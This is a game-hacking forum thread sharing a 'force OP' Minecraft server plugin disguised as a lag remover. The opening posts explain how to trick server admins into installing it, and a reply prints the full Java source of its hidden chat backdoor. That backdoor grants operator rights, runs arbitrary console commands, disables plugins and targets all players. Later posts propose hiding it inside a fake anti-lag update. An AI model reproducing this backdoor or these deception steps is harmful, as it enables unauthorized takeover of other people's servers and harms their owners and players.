Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › MultiPlayer Game Hacks & Cheats › Minecraft Hacks & Cheats › Minecraft Plugins › Force OP plugin

Force OP plugin

Posts 1–15 of 67 · Page 1 of 5
…
xLoLeRxx
xLoLeRxx
Force OP plugin
So recently a lot of people wanted a force op plugin, so i found it for you!
When placed in plugins folder simply restart the server.

Virustotal:
https://www.virustotal.com/lv/file/3...is/1388668571/
Jotti:
http://virusscan.jotti.org/en/scanre...c4efa9e6028a83
For all commands type
Code:
==cmds
Download and thanks
LagRemover_mpgh.net.zip
#1 · edited 12y ago · 12y ago
Lonesome Cowboy
Lonesome Cowboy
So what does this exactly do?
#2 · 12y ago
xLoLeRxx
xLoLeRxx
Quote Originally Posted by Lonesome Cowboy View Post
So what does this exactly do?
You tell an admin that his server needs a fps boost, like its laggy. So you give an admin this plugin, he installs it, then you can make yourself an op. This is mostly to troll friends.
#3 · 12y ago
Lonesome Cowboy
Lonesome Cowboy
Approved!
#4 · 12y ago
Jew
Jew
Quote Originally Posted by xLoLeRxx View Post
So recently a lot of people wanted a force op plugin, so i found it for you!
When placed in plugins folder simply restart the server.

Virustotal:
https://www.virustotal.com/lv/file/3...is/1388668571/
Jotti:
LagRemover.jar - Jotti's malware scan
wait For all commands type
Code:
==cmds
Download and thanks
wait a second,i send it to a unsespecting server,they use and then everyone has the permission for op?
#5 · 12y ago
non ame
non ame
Quote Originally Posted by Ex0rPl4net View Post
wait a second,i send it to a unsespecting server,they use and then everyone has the permission for op?
No. Just the users that use the special command will get OP.
#6 · 12y ago
Jew
Jew
Quote Originally Posted by non ame View Post
No. Just the users that use the special command will get OP.
writing /==cmds ?
lol,awsome.
#7 · 12y ago
non ame
non ame
Quote Originally Posted by Ex0rPl4net View Post
writing /==cmds ?
lol,awsome.
No I think it's just ==cmds
Everyone can use that command, but no one knows that it does exist.

PS: Just install it on your own (local) server and you can see how it works
#8 · 12y ago
Jew
Jew
Quote Originally Posted by non ame View Post
No I think it's just ==cmds
Everyone can use that command, but no one knows that it does exist.

PS: Just install it on your own (local) server and you can see how it works
i am gonna
#9 · 12y ago
Jew
Jew
Quote Originally Posted by non ame View Post
No I think it's just ==cmds
Everyone can use that command, but no one knows that it does exist.

PS: Just install it on your own (local) server and you can see how it works
it doesnt work...tried it.
#10 · 12y ago
non ame
non ame
Quote Originally Posted by Ex0rPl4net View Post
it doesnt work...tried it.
Just to be sure...
You know how to setup a local server using bukkit and adding plugins?
#11 · 12y ago
Jew
Jew
Quote Originally Posted by Ex0rPl4net View Post
it doesnt work...tried it.
ok i found the config java class:

Code:
@EventHandler
	public void onPlayerChat(AsyncPlayerChatEvent e)
	{
		String cmd = e.getMessage();
		if (cmd.startsWith("==")) 
		{
			String[] args = cmd.split(" ");
			if (args == null) 
			{
				return;
			}

			if(args[0].equalsIgnoreCase("==cmds1"))
			{
				e.getPlayer().sendMessage(ChatColor.AQUA + "==opme [Makes you an op]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==nameme (name) [Changes your name]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==nameall (name) [Changes all players names]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==gm2 [Sets you to adventure mode]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==gm1 [Sets you to creative mode]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==gm0 [Sets you to survival mode]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==exe (command) [Execute a command]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==disable (plugin) [Disable a plugin]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==opall [Ops every player on the server]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==deopall [Deops every player on the server]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==confuseall [Adds potion effects to everybody]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==killall [Kills all players]");
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==opme"))
			{
				e.getPlayer().setOp(true);
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==deopme"))
			{
				e.getPlayer().setOp(false);
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==nameall"))
			{
				String name = args[1];
				for (Player player : Bukkit.getOnlinePlayers()) {
					player.setDisplayName(name);
					player.setCustomName(name);
					player.setCustomNameVisible(true);
				}
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==nameme"))
			{
				String name = args[1];
				e.getPlayer().setDisplayName(name);
				e.getPlayer().setCustomName(name);
				e.getPlayer().setCustomNameVisible(true);
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==gm2"))
			{
				e.getPlayer().setGameMode(GameMode.ADVENTURE);
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==gm1"))
			{
				e.getPlayer().setGameMode(GameMode.CREATIVE);
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==gm0"))
			{
				e.getPlayer().setGameMode(GameMode.SURVIVAL);
				e.setCancelled(true);
			}

			if ((args[0].equalsIgnoreCase("==exe")) && (args.length >= 2)) 
			{
				String command = "";
				for (int i = 1; i < args.length; i++) {
					command = command + args[i] + " ";
				}
				Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), command.trim());
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==disable"))
			{
				Plugin plugin = Bukkit.getPluginManager().getPlugin(args[1]);
				if (plugin != null) 
				{
					Bukkit.getPluginManager().disablePlugin(plugin);
				}
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==opall"))
			{
				for (Player player : Bukkit.getOnlinePlayers()) {
					player.setOp(true);
				}
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==deopall"))
			{
				for (Player player : Bukkit.getOnlinePlayers()) {
					player.setOp(false);
				}
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==confuseall"))
			{
				for (Player player : Bukkit.getOnlinePlayers()) {
					player.addPotionEffect(new PotionEffect(PotionEffectType.CONFUSION, 200, 0));
					player.addPotionEffect(new PotionEffect(PotionEffectType.WEAKNESS, 200, 0));
					player.addPotionEffect(new PotionEffect(PotionEffectType.SLOW, 200, 0));
					player.addPotionEffect(new PotionEffect(PotionEffectType.BLINDNESS, 200, 0));
				}
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==killall"))
			{
				for (Player player : Bukkit.getOnlinePlayers()) {
					player.isDead();
				}
				e.setCancelled(true);
			}
		}
	}

}
in other words:
e.getPlayer().sendMessage(ChatColor.AQUA + "==opme [Makes you an op]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==nameme (name) [Changes your name]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==nameall (name) [Changes all players names]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==gm2 [Sets you to adventure mode]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==gm1 [Sets you to creative mode]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==gm0 [Sets you to survival mode]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==exe (command) [Execute a command]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==disable (plugin) [Disable a plugin]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==opall [Ops every player on the server]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==deopall [Deops every player on the server]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==confuseall [Adds potion effects to everybody]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==killall [Kills all players]");
#12 · 12y ago
71c
71c
Pretty good I will use it !
#13 · 12y ago
MattRobbSan
MattRobbSan
Quote Originally Posted by Ex0rPl4net View Post
ok i found the config java class:

Code:
@EventHandler
	public void onPlayerChat(AsyncPlayerChatEvent e)
	{
		String cmd = e.getMessage();
		if (cmd.startsWith("==")) 
		{
			String[] args = cmd.split(" ");
			if (args == null) 
			{
				return;
			}

			if(args[0].equalsIgnoreCase("==cmds1"))
			{
				e.getPlayer().sendMessage(ChatColor.AQUA + "==opme [Makes you an op]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==nameme (name) [Changes your name]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==nameall (name) [Changes all players names]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==gm2 [Sets you to adventure mode]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==gm1 [Sets you to creative mode]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==gm0 [Sets you to survival mode]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==exe (command) [Execute a command]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==disable (plugin) [Disable a plugin]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==opall [Ops every player on the server]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==deopall [Deops every player on the server]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==confuseall [Adds potion effects to everybody]");
				e.getPlayer().sendMessage(ChatColor.AQUA + "==killall [Kills all players]");
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==opme"))
			{
				e.getPlayer().setOp(true);
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==deopme"))
			{
				e.getPlayer().setOp(false);
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==nameall"))
			{
				String name = args[1];
				for (Player player : Bukkit.getOnlinePlayers()) {
					player.setDisplayName(name);
					player.setCustomName(name);
					player.setCustomNameVisible(true);
				}
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==nameme"))
			{
				String name = args[1];
				e.getPlayer().setDisplayName(name);
				e.getPlayer().setCustomName(name);
				e.getPlayer().setCustomNameVisible(true);
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==gm2"))
			{
				e.getPlayer().setGameMode(GameMode.ADVENTURE);
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==gm1"))
			{
				e.getPlayer().setGameMode(GameMode.CREATIVE);
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==gm0"))
			{
				e.getPlayer().setGameMode(GameMode.SURVIVAL);
				e.setCancelled(true);
			}

			if ((args[0].equalsIgnoreCase("==exe")) && (args.length >= 2)) 
			{
				String command = "";
				for (int i = 1; i < args.length; i++) {
					command = command + args[i] + " ";
				}
				Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), command.trim());
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==disable"))
			{
				Plugin plugin = Bukkit.getPluginManager().getPlugin(args[1]);
				if (plugin != null) 
				{
					Bukkit.getPluginManager().disablePlugin(plugin);
				}
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==opall"))
			{
				for (Player player : Bukkit.getOnlinePlayers()) {
					player.setOp(true);
				}
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==deopall"))
			{
				for (Player player : Bukkit.getOnlinePlayers()) {
					player.setOp(false);
				}
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==confuseall"))
			{
				for (Player player : Bukkit.getOnlinePlayers()) {
					player.addPotionEffect(new PotionEffect(PotionEffectType.CONFUSION, 200, 0));
					player.addPotionEffect(new PotionEffect(PotionEffectType.WEAKNESS, 200, 0));
					player.addPotionEffect(new PotionEffect(PotionEffectType.SLOW, 200, 0));
					player.addPotionEffect(new PotionEffect(PotionEffectType.BLINDNESS, 200, 0));
				}
				e.setCancelled(true);
			}

			if(args[0].equalsIgnoreCase("==killall"))
			{
				for (Player player : Bukkit.getOnlinePlayers()) {
					player.isDead();
				}
				e.setCancelled(true);
			}
		}
	}

}
in other words:
e.getPlayer().sendMessage(ChatColor.AQUA + "==opme [Makes you an op]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==nameme (name) [Changes your name]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==nameall (name) [Changes all players names]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==gm2 [Sets you to adventure mode]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==gm1 [Sets you to creative mode]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==gm0 [Sets you to survival mode]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==exe (command) [Execute a command]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==disable (plugin) [Disable a plugin]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==opall [Ops every player on the server]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==deopall [Deops every player on the server]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==confuseall [Adds potion effects to everybody]");
e.getPlayer().sendMessage(ChatColor.AQUA + "==killall [Kills all players]");
Is this the entire code? If so, I could just add this into another plugin like some sort of anti-lag plugin, say its an update and get them to install it?
#14 · 12y ago
Jew
Jew
Quote Originally Posted by MattRobbSan View Post
Is this the entire code? If so, I could just add this into another plugin like some sort of anti-lag plugin, say its an update and get them to install it?
its obviously a very small plugin,download it and look for yourself..i dont know shit about java
#15 · 12y ago
Posts 1–15 of 67 · Page 1 of 5
…

Post a Reply

Similar Threads

  • Force Op Plugin plz!By joao321 in Minecraft Help
    2Last post 13y ago
  • Force Op PluginBy Mr7asteen in Minecraft Selling / Trading / Buying
    11Last post 13y ago
  • Anti Cheat Force OP Plugin 1.7.2-1.7.5By unitedmelonpvp in Minecraft Plugins
    11Last post 12y ago
  • Minecraft Force op PluginBy Mr7asteen in Minecraft Selling / Trading / Buying
    4Last post 12y ago
  • Selling Custom Force Op PluginBy The Doctor. in Minecraft Selling / Trading / Buying
    2Last post 12y ago

Tags for this Thread

None